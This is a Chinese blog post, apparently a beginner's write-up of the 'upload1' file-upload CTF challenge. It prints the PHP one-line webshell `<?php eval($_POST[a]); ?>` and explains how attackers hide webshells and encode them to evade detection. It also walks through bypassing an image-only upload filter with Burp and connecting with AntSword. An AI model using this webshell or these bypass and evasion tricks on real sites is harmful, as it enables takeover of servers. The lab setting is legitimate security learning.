当前位置: 首页 > news >正文

web——upload1——攻防世界

第一次做木马题目,有点懵逼,浮现一下做题思路

可以上传一个文件,通过学习学习到了一句话木马

一句话木马:

利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']表示从页面中获得attack这个参数值。

文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者 WebShell 等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。

Webshell简述
WebShell 就是以 asp、php、jsp 或者 cgi 等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些 asp 或 php 后门文件与网站服务器 web 目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。

WebShell 后门隐蔽较性高,可以轻松穿越防火墙,访问 WebShell 时不会留下系统日志,只会在网站的 web 日志中留下一些数据提交记录,没有经验的管理员不容易发现入侵痕迹。攻击者可以将 WebShell 隐藏在正常文件中并修改文件时间增强隐蔽性,也可以采用一些函数对 WebShell 进行编码或者拼接以规避检测。除此之外,通过一句话木马的小马来提交功能更强大的大马可以更容易通过应用本身的检测,<?php eval($_POST[a]); ?>就是一个最常见最原始的小马。

这个差不多就是基础知识,这个网页只要上传图片文件,别的不能上传

1.使用burp抓包

2.将一句话木马后缀写成.png

上传

将不可见改为1234.php文件,burpsuite点击forword上传以后一句话木马就上传成功了,观察上传木马的后缀名可以得到该后缀名为php,说明修改成功了。

成功了

4.使用蚂剑来远程链接

添加数据

输入URL地址和密码(123)

链接成功,

找到flag

http://www.lryc.cn/news/477870.html

相关文章:

  • nginx 搭建网站
  • Java基础-Java中的常用类(上)
  • 气压仪器智能打气泵方案芯片SIC8833
  • 软件测试(系统测试)的定位和专业:完善产品;专业;非助手;自动化
  • 2024 CSS保姆级教程四
  • PostgreSQL技术内幕17:PG分区表
  • 群控系统服务端开发模式-应用开发-上传工厂开发
  • 【Docker系列】指定系统平台拉取 openjdk:8 镜像
  • 语音识别:docker部署FunASR以及springboot集成funasr
  • Rust项目结构
  • 计算并联电阻的阻值
  • MySQL符号类型(详细)
  • Angular引用控件类
  • stm32 踩坑笔记
  • 文件上传和文件包含
  • [Unity Demo]从零开始制作空洞骑士Hollow Knight第十八集补充:制作空洞骑士独有的EventSystem和InputModule
  • yelp数据集上试验SVD,SVDPP,PMF,NMF 推荐算法
  • 计算机视觉常用数据集Cityscapes的介绍、下载、转为YOLO格式进行训练
  • Flink和Spark在实时计算方面有何异同
  • 纵然千万数据流逝,唯独vector长存
  • 【LeetCode】【算法】739. 每日温度
  • 2025年知识管理新方案:十款前沿知识库搭建工具详解
  • WebSocket实现消息实时推送
  • flink 内存配置(三):设置JobManager内存
  • 蓝桥杯 Python组-神奇闹钟(datetime库)
  • 解决阿里云三个月证书过期 免费SSL证书部署教程
  • VBA03-变量
  • docker-ce-stable‘ 下载元数据失败 : Cannot download repomd.xml: Cannot download
  • C中定义字符串有下列几种形式
  • 写一个小日历